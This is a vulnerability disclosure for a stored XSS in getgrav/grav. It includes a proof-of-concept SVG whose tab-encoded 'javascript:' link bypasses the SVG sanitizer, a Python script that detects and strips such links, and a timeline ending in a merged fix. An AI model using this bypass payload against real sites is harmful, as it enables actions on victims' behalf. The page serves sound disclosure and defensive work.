Cross-site Scripting (XSS) - Stored in getgrav/grav

Valid

Reported on

Mar 1st 2022


Description

SVG sanitizer could be bypassed via the following SVG file, which leads to stored XSS

Proof of Concept

<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript&#9;:alert(document.domain)">
    <circle cx="0" cy="0" r="300"/>
  </a>
</svg>

Upload the above SVG file in your profile, view it, and click anywhere on the page; the XSS will then be triggered (screenshot: Deepin-Screenshot-select-area-20220301125616.png).

Impact

This vulnerability is capable of performing arbitrary actions on behalf of victims at the client side.
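The bypass works because the proof of concept puts a character reference for a tab (&#9;) inside the scheme, so a sanitizer that looks for the literal prefix "javascript:" never matches, while the browser's URL parser removes the tab and executes the link anyway. The following Python script is an added illustration of that gap and of the check a sanitizer needs instead; it is not Grav's sanitizer and not the fix merged in f19297. It re-parses the report's PoC (embedded below as a constructed copy), runs a naive prefix check and a hardened scheme allow-list check over every href-like attribute, and then strips the offending attribute. The allow-list of schemes is an assumption chosen for the example.

```python
import html
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Schemes this example lets through in href/xlink:href (assumed allow-list); everything else is dropped.
SAFE_SCHEMES = {"http", "https", "mailto"}

# Constructed copy of the report's proof-of-concept: the &#9; (tab) sits inside the scheme.
POC_SVG = """<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript&#9;:alert(document.domain)">
    <circle cx="0" cy="0" r="300"/>
  </a>
</svg>"""


def naive_is_dangerous(value):
    """Prefix check on the raw attribute value: the pattern the PoC slips past."""
    return value.lower().startswith("javascript:")


def normalize_url(value):
    """Canonicalise a URL the way a browser's URL parser does before it reads the scheme.

    1. Decode character references (covers sanitizers that work on raw markup; an XML
       parser has already turned &#9; into a real tab by the time this code sees it).
    2. Strip leading and trailing C0 controls and spaces.
    3. Remove ASCII tab, LF and CR anywhere in the string.
    """
    value = html.unescape(value)
    value = re.sub(r"^[\x00-\x20]+|[\x00-\x20]+$", "", value)
    return re.sub(r"[\t\n\r]", "", value)


def url_scheme(value):
    """Return the lower-cased scheme of a normalised URL, or None for a relative URL."""
    match = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", normalize_url(value))
    return match.group(1).lower() if match else None


def hardened_is_dangerous(value):
    """Allow-list check on the normalised scheme instead of a prefix check on raw text."""
    scheme = url_scheme(value)
    return scheme is not None and scheme not in SAFE_SCHEMES


def _local_name(qualified):
    # "{namespace}name" -> "name"; plain names pass through unchanged.
    return qualified.rsplit("}", 1)[-1]


def find_unsafe_links(svg_text, is_dangerous):
    """Return (element, attribute, value) for every href-like attribute the given check rejects."""
    root = ET.fromstring(svg_text)
    findings = []
    for elem in root.iter():
        for attr, value in elem.attrib.items():
            if _local_name(attr) == "href" and is_dangerous(value):
                findings.append((_local_name(elem.tag), _local_name(attr), value))
    return findings


def sanitize_svg(svg_text):
    """Drop every href-like attribute whose scheme is not allow-listed and re-serialise the SVG."""
    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", "http://www.w3.org/1999/xlink")
    root = ET.fromstring(svg_text)
    for elem in root.iter():
        for attr in [a for a in elem.attrib if _local_name(a) == "href"]:
            if hardened_is_dangerous(elem.attrib[attr]):
                del elem.attrib[attr]
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    print("naive check finds:", find_unsafe_links(POC_SVG, naive_is_dangerous))
    print("hardened check finds:", find_unsafe_links(POC_SVG, hardened_is_dangerous))
    print(sanitize_svg(POC_SVG))
```

Run as-is, the naive check reports nothing for the PoC while the hardened check flags the `a` element's `href`, and `sanitize_svg` returns the drawing with that attribute removed. Normalising before classifying is the point: prefix matching on the raw string can always be sidestepped by another encoding of the same scheme, whereas an allow-list applied to the parsed scheme fails closed. Independently of the sanitizer, an SVG only executes script when it is opened as a document, so serving user uploads from a separate origin or with `Content-Disposition: attachment` limits the impact of any future bypass.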

We are processing your report and will contact the getgrav/grav team within 24 hours. 3 months ago
We have contacted a member of the getgrav/grav team and are waiting to hear back 3 months ago
We have sent a follow up to the getgrav/grav team. We will try again in 7 days. 3 months ago
Anna
3 months ago

Researcher


Any update?

We have sent a second follow up to the getgrav/grav team. We will try again in 10 days. 3 months ago
Anna
2 months ago

Researcher


Any update?

Djamil Legato validated this vulnerability 2 months ago
Anna has been awarded the disclosure bounty
The fix bounty is now up for grabs
Djamil Legato confirmed that a fix has been merged on f19297 2 months ago
Djamil Legato has been awarded the fix bounty
Djamil Legato
2 months ago

Maintainer


Thank you, we have a fix for this
